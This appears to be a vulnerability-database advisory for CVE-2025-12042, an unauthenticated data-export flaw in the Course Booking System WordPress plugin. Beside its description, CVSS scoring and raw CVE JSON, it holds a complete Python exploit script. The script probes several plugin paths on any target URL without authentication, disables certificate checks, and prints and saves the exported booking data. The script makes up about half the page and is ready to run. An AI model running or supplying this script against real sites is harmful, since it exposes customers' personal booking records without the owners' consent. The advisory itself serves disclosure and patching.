Security Vulnerability Report
中文
CVE-2025-12042 CVSS 5.3 MEDIUM

CVE-2025-12042

Published: 2025-11-08 04:15:44
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Course Booking System plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in the csv-export.php file in all versions up to, and including, 6.1.5. This makes it possible for unauthenticated attackers to directly access the file and obtain an export of all booking data.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Course Booking System plugin for WordPress <= 6.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-12042 PoC - WordPress Course Booking System Unauthorized Data Export This PoC demonstrates the exploitation of missing authorization check in csv-export.php """ import requests import sys import argparse from datetime import datetime def exploit_cve_2025_12042(target_url): """ Exploit the missing authorization check in Course Booking System plugin to export all booking data without authentication """ print(f"[*] Starting exploitation of CVE-2025-12042") print(f"[*] Target: {target_url}") print(f"[*] Time: {datetime.now().isoformat()}") # Common paths for csv-export.php paths = [ "/wp-content/plugins/course-booking-system/csv-export.php", "/wp-content/plugins/course-booking-system/includes/csv-export.php", "/wp-content/plugins/course-booking/csv-export.php", "/csv-export.php" ] for path in paths: url = target_url.rstrip('/') + path print(f"\n[*] Trying path: {path}") try: # Send GET request without any authentication headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } response = requests.get(url, headers=headers, timeout=10, verify=False) # Check if the response contains CSV data if response.status_code == 200: content_type = response.headers.get('Content-Type', '') # Check if response looks like CSV data if 'csv' in content_type or 'text/csv' in content_type or \ ',' in response.text[:500]: print(f"[+] SUCCESS! Found vulnerable endpoint: {url}") print(f"[+] Response contains CSV data") print(f"[+] Content-Length: {len(response.text)} bytes") print(f"\n[+] First 1000 characters of exported data:") print(response.text[:1000]) # Save the exported data output_file = f"cve_2025_12042_export_{datetime.now().strftime('%Y%m%d_%H%M%S')}.csv" with open(output_file, 'w', encoding='utf-8') as f: f.write(response.text) print(f"[+] Full data saved to: {output_file}") return True elif 'booking' in response.text.lower() or 'course' in response.text.lower(): print(f"[+] Potential vulnerability confirmed at: {url}") print(f"[*] Response preview: {response.text[:500]}") return True else: print(f"[-] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") continue print("\n[-] No vulnerable endpoint found") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-12042 PoC') parser.add_argument('-u', '--url', required=True, help='Target WordPress URL') args = parser.parse_args() # Disable SSL warnings for testing import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) exploit_cve_2025_12042(args.url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12042", "sourceIdentifier": "[email protected]", "published": "2025-11-08T04:15:43.937", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Course Booking System plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in the csv-export.php file in all versions up to, and including, 6.1.5. This makes it possible for unauthenticated attackers to directly access the file and obtain an export of all booking data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3389366%40course-booking-system&new=3389366%40course-booking-system&sfp_email=&sfph_mail=#file86", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/38b2b477-5b8a-42c2-b346-57707d9a34a5?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.